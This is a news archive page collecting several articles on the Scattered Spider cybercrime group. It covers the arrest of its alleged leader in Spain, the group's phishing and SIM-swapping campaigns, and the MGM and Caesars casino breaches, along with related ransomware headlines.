Category: MGM

A 22-year-old man from the United Kingdom arrested this week in Spain is allegedly the ringleader of Scattered Spider, a cybercrime group suspected of hacking into Twilio, LastPass, DoorDash, Mailchimp, and nearly 130 other organizations over the past two years.

The Spanish daily Murcia Today reports the suspect was wanted by the FBI and arrested in Palma de Mallorca as he tried to board a flight to Italy.

A still frame from a video released by the Spanish national police shows Tylerb in custody at the airport.

“He stands accused of hacking into corporate accounts and stealing critical information, which allegedly enabled the group to access multi-million-dollar funds,” Murcia Today wrote. “According to Palma police, at one point he controlled Bitcoins worth $27 million.”

The cybercrime-focused Twitter/X account vx-underground said the U.K. man arrested was a SIM-swapper who went by the alias “Tyler.” In a SIM-swapping attack, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls sent to the victim — including one-time passcodes for authentication, or password reset links sent via SMS.

“He is a known SIM-swapper and is allegedly involved with the infamous Scattered Spider group,” vx-underground wrote on June 15, referring to a prolific gang implicated in costly data ransom attacks at MGM and Caesars casinos in Las Vegas last year.

Sources familiar with the investigation told KrebsOnSecurity the accused is a 22-year-old from Dundee, Scotland named Tyler Buchanan, also allegedly known as “tylerb” on Telegram chat channels centered around SIM-swapping.

In January 2024, U.S. authorities arrested another alleged Scattered Spider member — 19-year-old Noah Michael Urban of Palm Coast, Fla. — and charged him with stealing at least $800,000 from five victims between August 2022 and March 2023. Urban allegedly went by the nicknames “Sosa” and “King Bob,” and is believed to be part of the same crew that hacked Twilio and a slew of other companies in 2022.

Investigators say Scattered Spider members are part of a more diffuse cybercriminal community online known as “The Com,” wherein hackers from different cliques boast loudly about high-profile cyber thefts that almost invariably begin with social engineering — tricking people over the phone, email or SMS into giving away credentials that allow remote access to corporate internal networks.

One of the more popular SIM-swapping channels on Telegram maintains a frequently updated leaderboard of the most accomplished SIM-swappers, indexed by their supposed conquests in stealing cryptocurrency. That leaderboard currently lists Sosa as #24 (out of 100), and Tylerb at #65.

0KTAPUS

In August 2022, KrebsOnSecurity wrote about peering inside the data harvested in a months-long cybercrime campaign by Scattered Spider involving countless SMS-based phishing attacks against employees at major corporations. The security firm Group-IB dubbed the gang by a different name — 0ktapus, a nod to how the criminal group phished employees for credentials.

The missives asked users to click a link and log in at a phishing page that mimicked their employer’s Okta authentication page. Those who submitted credentials were then prompted to provide the one-time password needed for multi-factor authentication.

These phishing attacks used newly-registered domains that often included the name of the targeted company, and sent text messages urging employees to click on links to these domains to view information about a pending change in their work schedule. The phishing sites also featured a hidden Telegram instant message bot to forward any submitted credentials in real-time, allowing the attackers to use the phished username, password and one-time code to log in as that employee at the real employer website.

One of Scattered Spider’s first big victims in its 2022 SMS phishing spree was Twilio, a company that provides services for making and receiving text messages and phone calls. The group then pivoted, using their access to Twilio to attack at least 163 of its customers.

A Scattered Spider phishing lure sent to Twilio employees.

Among those was the encrypted messaging app Signal, which said the breach could have let attackers re-register the phone number on another device for about 1,900 users.

Also in August 2022, several employees at email delivery firm Mailchimp provided their remote access credentials to this phishing group. According to Mailchimp, the attackers used their access to Mailchimp employee accounts to steal data from 214 customers involved in cryptocurrency and finance.

On August 25, 2022, the password manager service LastPass disclosed a breach in which attackers stole some source code and proprietary LastPass technical information, and weeks later LastPass said an investigation revealed no customer data or password vaults were accessed.

However, on November 30, 2022 LastPass disclosed a far more serious breach that the company said leveraged data stolen in the August breach. LastPass said criminal hackers had stolen encrypted copies of some password vaults, as well as other personal information.

In February 2023, LastPass disclosed that the intrusion involved a highly complex, targeted attack against an engineer who was one of only four LastPass employees with access to the corporate vault. In that incident, the attackers exploited a security vulnerability in a Plex media server that the employee was running on his home network, and succeeded in installing malicious software that stole passwords and other authentication credentials. The vulnerability exploited by the intruders was patched back in 2020, but the employee never updated his Plex software.

Plex announced its own data breach one day before LastPass disclosed its initial August intrusion. On August 24, 2022, Plex’s security team urged users to reset their passwords, saying an intruder had accessed customer emails, usernames and encrypted passwords.

TURF WARS

Sosa and Tylerb were both subjected to physical attacks from rival SIM-swapping gangs. These communities have been known to settle scores by turning to so-called “violence-as-a-service” offerings on cybercrime channels, wherein people can be hired to perform a variety geographically-specific “in real life” jobs, such as bricking windows, slashing car tires, or even home invasions.

In 2022, a video surfaced on a popular cybercrime channel purporting to show attackers hurling a brick through a window at an address that matches the spacious and upscale home of Urban’s parents in Sanford, Fl.

January’s story on Sosa noted that a junior member of his crew named “Foreshadow” was kidnapped, beaten and held for ransom in September 2022. Foreshadow’s captors held guns to his bloodied head while forcing him to record a video message pleading with his crew to fork over a $200,000 ransom in exchange for his life (Foreshadow escaped further harm in that incident).

According to several SIM-swapping channels on Telegram where Tylerb was known to frequent, rival SIM-swappers hired thugs to invade his home in February 2023. Those accounts state that the intruders assaulted Tylerb’s mother in the home invasion, and that they threatened to burn him with a blowtorch if he didn’t give up the keys to his cryptocurrency wallets. Tylerb was reputed to have fled the United Kingdom after that assault.

KrebsOnSecurity sought comment from Mr. Buchanan, and will update this story in the event he responds.

A lawsuit has been initiated against two prominent gaming entities due to their failure to safeguard the personal identifiable information of their customers, resulting in a substantial potential penalty, possibly amounting to millions of dollars. The legal action revolves around MGM Resorts International and Caesars Entertainment, both of which fell victim to a highly sophisticated file-encrypting malware attack towards the end of last week.

Currently, it has come to light that two separate lawsuits have been filed in connection with the MGM cyber-attack, while Caesars Gaming company is contending with three legal actions, one of which was freshly filed just last Friday.

The identity of the culprits behind the security breaches at both companies remains shrouded in mystery. However, a hacking group known as “VX-Underground” has made allegations that the ALPHV, also known as the BlackCat ransomware group, played a role in the incident, managing to exfiltrate a portion of data from the compromised servers.

Collaborating closely, the Nevada Gaming Control Board and the FBI have launched an investigation into this cyber incident. Their findings are expected to be presented in a report due early next month.

In a positive turn of events, MGM Resorts and Hotels have successfully resolved the situation, restoring their systems to normalcy after a 10-day shutdown. It remains unclear whether they acquiesced to the hackers’ demands or relied on their business continuity plan to restore applications and data to their usual state.

As for Caesars, the company has not yet issued an official statement regarding the matter.

It’s important to note that in both incidents, the attackers gained access to the systems by obtaining network login credentials through a Vishing attack perpetrated against an unsuspecting employee. Consequently, businesses are urged to adopt a comprehensive approach to cybersecurity, emphasizing the importance of awareness training for their staff to guard against such threats, which can potentially target any organization at least once a year.

The post Lawsuit against MGM and Ceasars Entertainment Ransomware Attack appeared first on Cybersecurity Insiders.

Investigation Deepens into MGM Resorts Hack and Caesars Entertainment Ransomware Attack

Recent developments in the ongoing investigation into the MGM Resorts hack and the Caesars Entertainment ransomware attack have shed new light on the culprits behind these cybercrimes. Law enforcement agencies working on the case have revealed that the individuals responsible for these attacks are likely to be between the ages of 17 and 22. This revelation is substantiated by the research findings of Unit 42, the cybersecurity division of Palo Alto Networks.

The sequence of events that led to these cyberattacks commenced with a deceptively simple phone call. The attackers managed to persuade senior staff members to divulge their login credentials, thereby gaining unauthorized access to the corporate networks of these major gaming and casino giants. What’s particularly intriguing about these hackers is that they appear to be quite young, possibly as young as 17, and their voices were identified as being native English speakers. They were tasked with infiltrating these networks through a technique known as Vishing, which involves manipulating individuals over the phone.

As the Scattered Spider group, also known as UNC3944, breached the systems of two of the world’s largest gaming and casino corporations, concerns are mounting about the evolving sophistication of cyber threats in the future.

RANSOMEDVC Claims to Infiltrate Sony Corporation Computer Network

A ransomware group known as RANSOMEDVC has allegedly infiltrated the computer networks of Sony Corporation with the aim of acquiring valuable intelligence and exfiltrating sensitive information for later sale on the dark web.

Interestingly, RANSOMEDVC has refrained from making any ransom demands to the victimized Sony Systems firm. Instead, they intend to monetize their ill-gotten gains by selling the stolen data on the dark web to turn a profit.

In a show of their intent, the ransomware group has released the initial batch of stolen data, including PDFs and screenshots, as evidence of their capabilities. They claim that the senior management of the Japanese conglomerate has shown no interest in negotiating with the criminals regarding the data breach, leaving them with no recourse but to profit from the sale of the compromised information. This decision is motivated by the belief that the stolen data could yield substantially more revenue than any potential ransom payment.

Russian LockBit Ransomware Targets The Weather Network Servers

In a surprising and unprecedented move, the Russian-speaking ransomware group known as LockBit has issued a threat to release data associated with “The Weather Network” if their ransom demands are not met. This notorious group has a history of targeting corporate and government networks. However, this marks their first reported breach of a server network belonging to a weather reporting organization. Further details on this incident are eagerly awaited as the situation unfolds.

The post Trending Ransomware News headlines on Google appeared first on Cybersecurity Insiders.

In recent weeks, Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing. Prominent organizations, including Epic Games, Riot Games, AT&T, HubSpot, TTEC, Best Buy, Evernote, Microsoft, Coinbase, KuCoin, Binance, Twitter, Slack, Verizon Wireless, MetroPCS, T-Mobile, and the now-defunct UK fashion brand Skin Trend, have all fallen prey to this threat.

The group’s most recent victim, MGM Resorts and Hotels, is currently grappling with daily losses estimated at $6 million to $8 million. As the situation unfolds, these financial woes are expected to worsen in the coming weeks.

According to a report from Mandiant, the cyber attack on MGM hotels, which relied heavily on social engineering tactics, may lead to unexpected disruptions in the company’s operations. The IT teams are working tirelessly to restore the disrupted computer network, with a target timeframe of approximately 15 days. In the meantime, the company is already experiencing a cash flow deficit of $1 million, and there are concerns that this ongoing crisis could erode the trust of its loyal customers.

Such threats invariably leave a lasting impact on customer perceptions, especially as the holiday season approaches. Many customers may opt for alternative entertainment options this year, such as online betting or travel to destinations like Dubai, Singapore, or Malaysia, known for their thriving casino industries.

An insider at MGM reveals that the company used to enjoy daily cash flows of $7 million and $39 million in revenue. However, due to the ongoing digital turmoil, the entire gaming business has been disrupted, and the company is now heavily reliant on external investments for revenue.

It’s worth noting that Scattered Spider is known by various names within different organizations, such as Oktapus by Group IB, UNC3944 by Google-owned Mandiant, and Scattered Swine by Okta Trust.

The post Scattered Spider managed MGM Resort Network Outage brings $8m loss daily appeared first on Cybersecurity Insiders.